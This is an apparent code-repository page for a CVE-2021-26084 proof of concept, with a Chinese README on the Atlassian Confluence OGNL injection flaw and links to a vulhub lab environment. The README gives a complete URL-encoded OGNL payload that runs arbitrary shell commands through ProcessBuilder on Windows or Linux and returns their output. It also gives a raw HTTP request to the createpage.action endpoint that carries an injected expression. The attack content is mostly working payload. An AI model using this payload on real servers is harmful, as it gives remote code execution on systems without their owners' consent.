crash.software
Projects
Pull Requests
Issues
Builds
CVE-2021-26084
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY CVE-2021-26084 Files
🤬
66b643c5
ROOT /
CVE-2021-26084_Confluence_OGNLInjection.py Loading last commit info...
README.md
README.md

CVE-2021-26084

CVE-2021-26084,Atlassian Confluence OGNL注入漏洞

Atlassian Confluence 是企业广泛使用的维基系统,其部分版本中存在OGNL 表达式注入漏洞。攻击者可以通过漏洞,不需要任何用户的情况下在目标Confluence 中执行任意代码。

环境:

https://github.com/vulhub/vulhub/blob/master/confluence/

安装过程:

https://www.cnblogs.com/huangxiaosan/p/14290034.html

https://blog.csdn.net/weixin_43072923/article/details/117083611

安装过程:

image

数据库的账号密码postgres

image

设置邮箱账号密码

image

image

执行任意命令

queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027

/pages/createpage.action 这个接口需要一个可以创建页面的用户权限:

GET /pages/createpage.action?spaceKey=KK&fromPageId=65618&src=quick-create&queryString=%5cu0027%2b%7b233233%7d%2b%5cu0027 HTTP/1.1 Host: xxx.xxx.xxx.xxx:8090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://xxx.xxx.xxx.xxx:8090/display/KK/aza Cookie: JSESSIONID=861A420FD09295137056E0FA68111ECF; confluence.browse.space.cookie=space-attachments; confluence.last-web-item-clicked=system.space.tools%2Fpermissions%2Fspacepermissions; confluence.list.pages.cookie=list-content-tree Upgrade-Insecure-Requests: 1

Please wait...
Page is in error, reload to recover